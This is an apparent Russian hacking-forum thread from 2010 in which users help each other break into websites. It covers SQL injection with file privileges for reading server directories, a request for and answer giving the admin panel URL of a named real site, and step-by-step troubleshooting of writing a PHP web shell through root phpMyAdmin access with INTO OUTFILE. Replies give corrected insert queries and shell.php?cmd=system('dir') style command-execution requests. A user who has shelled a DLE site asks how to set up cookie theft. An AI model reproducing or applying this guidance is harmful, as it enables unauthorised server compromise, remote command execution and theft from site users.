15.11.2010, 11:25
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Вот скрипт от Dr.Z3r0:
Сообщение от Dr.Z3r0
Скрипт для вывода инфы через LIMIT или еще что нибудь этого рода
Крутит через лимит запросы. |
|
|
15.11.2010, 12:12
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:
Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий? |
|
|
|
15.11.2010, 12:26
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от freezed
Есть инъекция с file_priv:Y, помимо файлов можно читать и директории, но выдает их в слегка нечитаемом виде.
например /:
Есть ли возможность перевести в более читаемый режим и получить хотя бы список файлов/директорий? Ссылку дайте, видимо у вас что-то с кодировкой.
|
|
|
|
15.11.2010, 12:51
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Думаю, что с кодировкой все нормально, так как с чтением файлов проблем нет.
|
|
|
|
15.11.2010, 19:26
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Привет, подскажите плз, где админка в http://www.runiga.ru/ ?
|
|
|
|
15.11.2010, 21:13
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
http://www.runiga.ru/panel/
|
|
|
|
16.11.2010, 04:10
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Народ) кто знает почему такие траблы при залитии шелла через phpmyadmin
Вообщем имею доступ к пхпмайадмин под root'om с полными правами.
хочу залить шелл.
Мучу такой запрос:
Сообщение от None
CREATE TABLE `tableshell` (`shell` TEXT);
Сообщение от None
INSERT INTRO `tableshell` (`shell`) VALUES ('')
После второго запроса получаю такую ошибку:
Сообщение от None
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '`tableshell` (`shell`) VALUES (''' at line 1
Кто знает почему вылазит эта ошибка?
Пробовал другой выриант:
Сообщение от None
select '' from mysql.user into outfile 'E:/www.site.ru/shell.php'
Создается файл в корневой директории сайта.
Но при запросе http://www.site.ru/shell.php?cmd=dir получаю такую ошибку :
Сообщение от None
Parse error: syntax error, unexpected $end in E:\www.site.ru\shell.php(1) : eval()'d code on line 1
Что не так делаю? = \ |
|
|
|
16.11.2010, 06:04
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
GroM88
В первом случае у тебя нарушен синтаксис, верный запрос выглядит так:
PHP код:
[COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")
[/COLOR]
А если учесть, что не на всех серверах включена директива short_open_tag, то так:
PHP код:
[COLOR="#000000"]INSERT INTRO `tableshell` (`shell`) VALUES ("[COLOR="#0000BB"][/COLOR]")
[/COLOR]
Не забывай, что при таком методе залития, директива allow_url_include - должна находиться в положении On, иначе шелл не проинклудится.
Во втором случае, нарушен синтаксис и отсутствует логика.
Во первых, после команды нужна точка с запятой, например для вывода phpinfo синтаксически верным был бы такой запрос:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=phpinfo();
[/COLOR][/COLOR]
Во вторых, если ты собираешься вызывать системные команды, а не просто эвалить php код (команда dir, является системной командой Windows), то нужно использовать соответствующие функции, либо заключать команды в тильды (``), чтобы php понимал, что эту команду нужно выполнить, как команду оболочки.
О функциях исполнения системных команд и их различиях, можешь почитать тут http://www.php.su/functions/?cat=exec
Вывод листинга директорий для Windows систем, c учетом кода, что ты залил, можно получить одним из следующих запросов (если конечно соответствующие функции не отключены на сервере или не включен safe mod):
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=echo `dir`;
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=passthru('dir');
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/shell.php?cmd=system('dir');
[/COLOR][/COLOR]
|
|
|
|
16.11.2010, 12:08
|
|
Познающий
Регистрация: 20.10.2010
Сообщений: 61
С нами:
8190326
Репутация:
0
|
|
Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ((!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]])) and ([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]"ИП_ЖЕРТВЫ"[/COLOR][COLOR="#007700"]) ) {
echo
[/COLOR][COLOR="#007700"]HTML;
}[/COLOR][/COLOR]
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив? |
|
|
|
16.11.2010, 14:43
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от spiderbuber
Сегодня залил шел на ДЛЕшный сайт, заглянул в dbconfig.php и увидел, что до меня тут кто-то уже побавал.. В конце конфига прописано:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ((!isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_password'[/COLOR][COLOR="#007700"]])) and ([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]"ИП_ЖЕРТВЫ"[/COLOR][COLOR="#007700"]) ) {
echo
[/COLOR][COLOR="#007700"]HTML;
}[/COLOR][/COLOR]
Я так понимаю, таким образом тырят куки юзеров.. А вот куда это сливается? Как самаму замутить такой слив? это больше на накрутку чего то тянет, по указанному выше адресу попадаем на страницу с фреймом где по идее юзеру парят примерно следующие куки
Set-Cookie: SL_003_0000=_10000_; domain=telefon4je.info; path=/; expires=Sat, 20-Nov-2010 18:35:15 GMT
Set-Cookie: TSUSER=003; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=telefon4je.info
Set-Cookie: SL_2_0000=_0_; domain=telefon4je.info; path=/; expires=Wed, 17-Nov-2010 14:35:15 GMT и переадресовывают 302 редиректом сюда new-xmading.ru
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
